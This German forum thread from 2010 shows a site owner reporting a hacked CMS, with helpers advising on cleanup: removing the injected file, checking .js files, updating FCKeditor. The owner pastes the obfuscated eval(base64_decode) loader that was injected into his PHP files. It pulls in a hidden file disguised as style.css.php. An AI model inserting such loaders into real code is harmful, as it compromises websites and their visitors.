Page 1 of 1
Seite gehackt
Posted: Thu 29. Jul 2010, 10:53
by Cipolla
Tja, da schauts wohl aus als ob eine Seite gehakt wurde. Alle PHP-Dateien sind mit verschlüsseltem Code versehen worden:
(Die Leerzeichen zwischen base habe ich reingemacht, da ich nicht weiß wie phpBB das behandelt)
Code: Select all
<?php /**/eval(b a s e 6 4_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzMvZDI2NDA1NjM3L2h0ZG9jcy9tZWdhc3VzL2Ntcy9pbmNsdWRlL2luY19leHQvZmNrZWRpdG9yL2VkaXRvci9maWxlbWFuYWdlci9icm93c2VyL2RlZmF1bHQvaW1hZ2VzL2ljb25zLzMyL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
Ich wollte die Seite auf den aktuellen Stand bringen, und beim abgleichen von Dateien ist mir das aufgefallen. Version ist zur Zeit noch 1.3.9
Liegt auf einem 1&1 Server. (Ja ich weiß, Jugensünde
Re: Seite gehackt
Posted: Thu 29. Jul 2010, 11:17
by flip-flop
Dann dekodiere das mal (
Base 64 Decoder) und nimm auf jeden Fall diese Datei raus und analysiere:
include/inc_ext/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php
->
http://forums.oscommerce.com/topic/3366 ... lp-please/
Posted 22 May 2009 - 09:28 AM
this infection does the following:
- adds a gifimg.php (or similarly named file) to most/all of your image directories
- adds a javascript function to many index.htm or index.html files on your site
- adds a javascript function to many .js files on your site.
FYI.
Re: Seite gehackt
Posted: Thu 29. Jul 2010, 11:54
by Cipolla
Yo, dank dir. Hatte das bereits dekodieren lassen, allerdings ist die style.css.php nochmals und nochmals codiert. Iwan hat der mir auch einen Fehler gemeldet, da hatte ich keinen Bock mehr.
Ich werde demnächst sowieso ein Update auf die aktuelle Version machen. Eigene bzw. geänderte php-Dateien sinds nur zwei-drei Stück, die kann ich dann von Hand kontrollieren.
Re: Seite gehackt
Posted: Thu 29. Jul 2010, 13:32
by flip-flop
Ja, ich hatte irgendwo gelesen dass die Dateien bis zu 10 mal kodiert sind.
U.U. könnte das noch wichtig sein: "- adds a javascript function to many .js files on your site"
Knut
Re: Seite gehackt
Posted: Thu 29. Jul 2010, 13:51
by Cipolla
Danke dir für den Hinweis. .js (Javascript)-Dateien habe ich allerdings keine eigenen oder geänderte auf dem Server. Ich habe grade noch ein relativ aktuelles Backup gefunden. Da sind diese Injektions noch nicht drin.
Denke ich spiele das Backup parallel auf und werde das dann updaten.
War das jetzt eine Sicherheitslücke im fckeditor? Es gab ja mal ein Update wegen einer solchen Schwachstelle wenn ich mich recht erinnere.
Re: Seite gehackt
Posted: Thu 29. Jul 2010, 13:55
by flip-flop
Schulterzuck,
dieses Teil befällt alle was php spricht, shops, bloggs usw. Ob die befallen Seiten auch diese ältere Variante des FCK verwenden weiß ich nicht. Könnte aber sein.
Sind die Dateien in der Nähe des FCK generiert worden?
Auch die html-Dateien des FCK prüfen.
Knut
Re: Seite gehackt
Posted: Thu 29. Jul 2010, 18:41
by juergen
Das Teil schadet nur wenn register globals auf ON steht.
Ich würde den FCK Editor einzeln updaten.
Re: Seite gehackt
Posted: Thu 29. Jul 2010, 22:40
by Cipolla
Ja, da wären wir dann wieder bei 1und1. Ich meine mich zu erinnern, das ich das vor jahren schon umgestellt haben wollte aber nada. Machen die nicht. Per .htaccess gings glaub ich iwi auch nicht (Fehler 500 oder so)
Aber wie gesagt, ich date das auf ie aktuelle und dann mal schauen ob die seite ruhe hat.